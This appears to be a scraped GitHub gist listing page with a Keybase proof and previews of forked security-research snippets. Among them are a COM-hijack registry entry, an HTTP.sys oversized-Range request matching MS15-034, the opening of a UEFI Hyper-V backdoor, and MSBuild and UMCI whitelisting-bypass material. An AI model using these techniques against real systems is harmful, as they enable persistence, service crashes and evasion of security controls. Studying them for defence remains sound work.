Keybase proof

I hereby claim:

  • I am hybriz on github.
  • I am hybriz (https://keybase.io/hybriz) on keybase.
  • I have a public key whose fingerprint is B551 1C31 3D1C 7273 7597 A18C 2A56 BF63 EBCF 54E8

To claim this, I am signing this object:

@hybriz
hybriz / clone-all-twitter-github-repos.sh
Created November 25, 2017 19:16 — forked from caniszczyk/clone-all-twitter-github-repos.sh
Clone all repos from a GitHub organization
curl -s 'https://api.github.com/orgs/twitter/repos?per_page=200' | ruby -rjson -e 'JSON.load(STDIN.read).each { |repo| system("git", "clone", repo["ssh_url"]) }'
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
@hybriz
hybriz / scriptlet.md
Created November 3, 2017 12:50 — forked from cure53/scriptlet.md
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn

Introduction

@hybriz
hybriz / dg.ps1
Created November 3, 2017 12:48 — forked from darkoperator/dg.ps1
Device Guard Configuration
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
$s2.Delete()
Remove-Item -Path C:\scpy -Force
Set-RuleOption -Option 3 -FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
@hybriz
hybriz / rpn-jit.c
Created November 3, 2017 12:42 — forked from anonymous/rpn-jit.c
RPN JIT Compiler
/* http://redd.it/2zna5q
* Fibonacci example:
* (1) (2) +
* 0:0
* 1:1
* 20
*/
#define _BSD_SOURCE // MAP_ANONYMOUS
#include <stdio.h>
#include <stdlib.h>
@hybriz
hybriz / DmaHvBackdoor.c
Created November 3, 2017 12:41 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers execution to previously loaded Hyper-V kernel (hvix64.sys)
@hybriz
hybriz / LoadMethodScanner.ps1
Created November 3, 2017 12:39 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
@hybriz
hybriz / pshell_template_embedded_script.xml
Created November 3, 2017 12:38 — forked from xorrior/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">